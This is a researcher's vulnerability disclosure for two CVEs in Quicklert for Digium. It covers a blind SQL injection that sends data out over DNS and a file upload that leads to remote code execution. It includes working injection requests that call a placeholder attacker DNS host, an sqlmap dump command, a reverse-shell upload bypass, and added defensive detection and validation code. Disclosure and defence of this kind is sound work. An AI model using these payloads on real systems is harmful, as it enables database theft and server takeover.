SQLi and RCE in Quicklert for Digium
Overview
At the end of 2021, I conducted a penetration test where I discovered two critical severity vulnerabilities in Quicklert for Digium Version 10 Build 1043. The first vulnerability was a blind SQL injection (SQLi) vulnerability which revealed the entirety of the database, including user authenticators (including Administrator) in plain text. This finding allowed me access to the rest of the web application gated behind authentication. After authenticating to the web application, I was able to discover an undocumented media library in the application that allowed for an arbitrary file upload resulting in remote code execution (RCE) and ultimately complete takeover of the server.
I, along with my employer, Assura Inc., registered the vulnerabilities with MITRE and worked with the vendor to correct the issues in the latest version. The vulnerabilities have since been patched in Quicklert for Digium Version 10 Build 1051. I have detailed each of the findings below.
CVE-2021-43969
Summary
Name | Quicklert for Digium Version 10 Build 1043 – Blind SQL Injection with Out-of-Band Interaction (DNS) |
Product | Quicklert for Digium |
Affected Versions | Version 10 Build <1051 |
State | Public |
Release Date | 2022-03-01 |
Vulnerability
Type | SQL Injection |
Rule | CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) https://cwe.mitre.org/data/definitions/89.html |
Remote | Yes |
Authentication Required | No |
CVSSv3 Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:X/IR:X/AR:X/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H |
CVSSv3 Base Score | 10 (Critical Severity) |
Exploit Available | No, but manually exploitable |
CVE ID(s) | CVE-2021-43969 |
Description
The ‘uname’ parameter of the login.jsp page for “Quicklert for Digium Version 10 Build 1043” is affected by both a blind SQL injection with out-of-band interaction and a time-based SQL injection. The exploitation of this vulnerability requires no prior authentication and results in the complete compromise of confidentiality, integrity, and availability of the underlying SQL database.
Proof-of-Concept
First, you must escape the value entered in the ‘uname’ parameter on the login.jsp page to inject code which will call back to a DNS server under our control (Burp Collaborator in this case) utilizing the MSSQL function “master.xp_dirtree”, which lists directory contents by default. The DNS server will not be found in a local directory and will result in the server making a request to our DNS server in an attempt to find that address for the master.xp_dirtree function. Note: If you attempt to recreate this exploit, you will need to URL encode the SQL statements as seen in the screenshots below.
GET /quicklert/login.jsp?function=login&smid=&uname=user', '1');declare @q varchar(99);set @q='\\<yourDNSserverhere>\x'; exec master.dbo.xp_dirtree @q;-- &passwd=password&b.x=0&b.y=0 HTTP/1.1
After validating that you are receiving DNS requests from the vulnerable server, it is possible to continue using the “master.xp_dirtree” function to exfiltrate data from the server including the database name, admin username, etc., by altering the above command slightly. See the example below where we retrieved the DB_NAME value by adding that additional argument:
GET /quicklert/login.jsp?function=login&smid=&uname=user', '1');declare @q varchar(99);set @q='\\'+(DB_name())+'.<yourDNSserverhere>\xci'; exec master.dbo.xp_dirtree @q;-- &passwd=password&b.x=0&b.y=0 HTTP/1.1
Note that via this technique we can see that the DB_NAME value for Quicklert (‘NIPA’ by default) is prepended to the DNS query that we received in the Burp Collaborator tool:
At this point, I could have continued this process of retrieving data piece by piece from the database through Burp Suite, but there is a limitation to the string size which can be retrieved through these types of DNS queries. This led me to utilize time-based SQL injections, which are easily automated using SQLmap.py by saving the Burp Suite request to a file and then using the following command:
sqlmap.py -r yourSQLirequesthere.txt -p uname --risk 3 --level 3 -D NIPA
I used variations on that command to “dump” the contents of the database. Within SQLmap.py I used --tables and --columns to find the fields I wanted to obtain. After doing this, I was able to obtain user IDs and passwords for every user in the database in plaintext, resulting in access to the web application as a valid user.
Exploit
There is no pre-packaged exploit for this vulnerability at this time although it can be easily exploited manually as shown in the Proof-of-Concept section above.
Mitigation
Quicklert corrected the sanitization issue in the ‘uname’ parameter in Quicklert v10 Build 1051.
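For servers that cannot be moved to Build 1051 immediately, web access logs can be checked for the request shape shown in the Proof-of-Concept. The following is an added example, not code from Quicklert or from the original write-up: it URL-decodes the ‘uname’ value of login.jsp requests and flags the markers seen above. The log format, the sample lines, the collab.example host and the function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the requests in the write-up (quote break-out, stacked
# DECLARE/EXEC, xp_dirtree, UNC path). WAITFOR DELAY is added here as the usual
# MSSQL time-based primitive; the write-up does not quote one.
INDICATORS = {
    "quote_breakout": re.compile(r"'\s*[,);]"),
    "stacked_statement": re.compile(r";\s*(?:declare|exec|waitfor)\b", re.I),
    "unc_path": re.compile(r"\\\\"),
    "waitfor_delay": re.compile(r"waitfor\s+delay", re.I),
    "xp_dirtree": re.compile(r"xp_dirtree", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_login(line):
    """Return the sorted indicator names found in the uname value of a login.jsp hit."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/login.jsp"):
        return []
    # parse_qs URL-decodes each value, so encoded payloads are matched in clear text.
    values = parse_qs(url.query, keep_blank_values=True).get("uname", [])
    return sorted({name for v in values for name, rx in INDICATORS.items() if rx.search(v)})

def scan(lines):
    """Return (client address, indicators) for every flagged line."""
    return [(line.split()[0], hits) for line in lines if (hits := suspicious_login(line))]

# Constructed sample lines in combined log format; the addresses and the
# collab.example host are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Nov/2021:10:00:01 +0000] "GET /quicklert/login.jsp?function=login&smid=&uname=jsmith&passwd=REDACTED&b.x=0&b.y=0 HTTP/1.1" 200 512',
    '192.0.2.11 - - [12/Nov/2021:10:00:02 +0000] "GET /quicklert/login.jsp?function=login&smid=&uname=o%27brien&passwd=REDACTED HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Nov/2021:10:03:40 +0000] "GET /quicklert/login.jsp?function=login&smid=&uname=user%27%2C%20%271%27%29%3Bdeclare%20%40q%20varchar%2899%29%3Bset%20%40q%3D%27%5C%5Ccollab.example%5Cx%27%3B%20exec%20master.dbo.xp_dirtree%20%40q%3B--%20&passwd=x HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

A hit on xp_dirtree or a UNC path in a login field is also a reason to review outbound DNS and SMB traffic from the database host for the same time window.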
References
Vendor Page | https://quicklert.com/ |
CVE Description | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43969 |
Official Write-Up | https://www.assurainc.com/assura-announces-discovery-of-two-vulnerabilities-in-quicklert-for-digium-switchvox/amp-on/ |
Timeline
- 2021-11-12: Vulnerability discovered
- 2021-11-12: Vendor contacted
- 2021-11-17: CVE #s issued by MITRE
- 2022-02-22: Vendor confirmed patch
- 2022-03-01: Public disclosure by Assura
- 2022-03-13: Personal write-up
CVE-2021-43970
Summary
Name | Quicklert for Digium Version 10 Build 1043 – Arbitrary File Upload Results in Remote Code Execution |
Product | Quicklert for Digium |
Affected Versions | Version 10 Build <1051 |
State | Public |
Release Date | 2022-03-01 |
Vulnerability
Type | Arbitrary File Upload |
Rule | CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.html |
Remote | Yes |
Authentication Required | Yes |
CVSSv3 Vector | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:L/IR:H/AR:H/MAV:N/MAC:L/MPR:L/MUI:N/MS:C/MC:H/MI:H/MA:H |
CVSSv3 Base Score | 9.9 (Critical Severity) |
Exploit Available | No, but manually exploitable |
CVE ID(s) | CVE-2021-43970 |
Description
The ‘audioFile’ parameter of the /quicklert/albumimages.jsp web form in Quicklert for Digium Version 10 Build 1043 is vulnerable to arbitrary file upload. This vulnerability allows authenticated (low privilege) attackers to upload malicious files to the server which are then executed when called by the media viewer within the web application. The exploitation of this vulnerability resulted in a complete compromise of the confidentiality, integrity, and availability of the server and served as a jump point into the victim’s network.
Proof-of-Concept
After gaining credentials via the SQLi above, I was authenticated to the web application and subsequently discovered the /quicklert/album.jsp page which allowed me to add a new media album to my account. After creating the new album, I was then able to upload new media files via the /quicklert/albumimages.jsp web form.
I then created a Java reverse shell utilizing msfvenom which was saved as “reverse.mp3”. The payload was uploaded via /quicklert/albumimages.jsp while the interceptor functionality of Burp Suite proxy was running. This allowed me to capture the POST request and make the following modifications:
- I renamed the filename from “reverse.mp3” to “reverse.mp3;.jsp”. This ensures that the server recognizes the Java reverse shell as a valid JSP file while bypassing the limited file extension validations the web application had in place.
- Additionally, I added a small piece of the byte-stream from a valid mp3 file by “catting” the file and then pasting the results above the current payload in Burp Suite. This also helps to bypass file-type filtering when the application is checking the file to validate that it appears to match the mime-type and/or extension declared in the POST request.
After making these modifications, I released the intercepted request to allow it to POST the payload to the server.
Figure 6: File Upload POST Request Captured in Burp Suite Before Modifications
Figure 7: File Upload POST Request Captured in Burp Suite After Modifications
After the file was posted on the server, I started a Meterpreter listener and then accessed the “reverse.mp3;.jsp” payload on the server. The server interpreted the Java Server Page (jsp) file correctly and created a reverse connection back to my listener which ultimately resulted in a total takeover of the server within the victim’s DMZ because the application was running as SYSTEM (Windows).
Exploit
There is no pre-packaged exploit for this vulnerability at this time although it can be easily exploited manually as shown in the Proof-of-Concept section above.
Mitigation
Quicklert added additional file-type validation to the i.Album feature within the application to prevent uploading of potentially malicious file types.
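The two modifications described in the Proof-of-Concept defeat checks that trust the client-supplied file name or only inspect the leading bytes of the file. The following is an added example, not Quicklert's code or the vendor's fix: it contrasts a hypothetical weak check (naive_check, a stand-in for the validation the write-up does not show) with a stricter handler that accepts only a plain name.ext, allowlists the extension, and stores the file under a server-generated name. All names and sample bytes are assumptions constructed for the example.

```python
import os
import re
import uuid

# Leading bytes of MP3 data: ID3v2 tag or an MPEG audio frame sync.
MAGIC = {".mp3": (b"ID3", b"\xff\xfb", b"\xff\xf3", b"\xff\xf2")}
# One base name, one dot, one extension: no ';', no second dot, no path parts.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}")

class UploadRejected(ValueError):
    pass

def naive_check(client_name, data):
    """Hypothetical weak validation: '.mp3' somewhere in the name plus MP3 magic bytes."""
    return ".mp3" in client_name.lower() and data.startswith(MAGIC[".mp3"])

def storage_name(client_name, data):
    """Validate an upload and return the server-generated name to store it under."""
    if not SAFE_NAME.fullmatch(client_name):
        raise UploadRejected("file name is not <name>.<ext>")
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in MAGIC:
        raise UploadRejected("extension not allowed: " + ext)
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not look like " + ext)
    # The client name is never used on disk, so whatever follows the MP3 header
    # cannot end up under a name the servlet container maps to the JSP engine.
    return uuid.uuid4().hex + ext

# Constructed inputs: a few MP3 header bytes followed by inert placeholder text.
MP3_HEADER = b"ID3\x03\x00\x00\x00\x00\x00\x0a"
POLYGLOT = MP3_HEADER + b"<%-- placeholder for script content --%>"

def demo():
    results = {"naive": naive_check("reverse.mp3;.jsp", POLYGLOT)}
    try:
        storage_name("reverse.mp3;.jsp", POLYGLOT)
        results["strict"] = "accepted"
    except UploadRejected as exc:
        results["strict"] = str(exc)
    results["legit"] = storage_name("greeting.mp3", MP3_HEADER)
    return results

if __name__ == "__main__":
    print(demo())
```

The magic-byte test passes for the prepended-header file under either check, so the controls that matter are the generated storage name and an upload directory from which the application server never executes content.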
References
Vendor Page | https://quicklert.com/ |
CVE Description | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43970 |
Official Write-Up | https://www.assurainc.com/assura-announces-discovery-of-two-vulnerabilities-in-quicklert-for-digium-switchvox/amp-on/ |
Timeline
- 2021-11-12: Vulnerability discovered
- 2021-11-12: Vendor contacted
- 2021-11-17: CVE #s issued by MITRE
- 2022-02-22: Vendor confirmed patch
- 2022-03-01: Public disclosure
- 2022-03-13: Personal write-up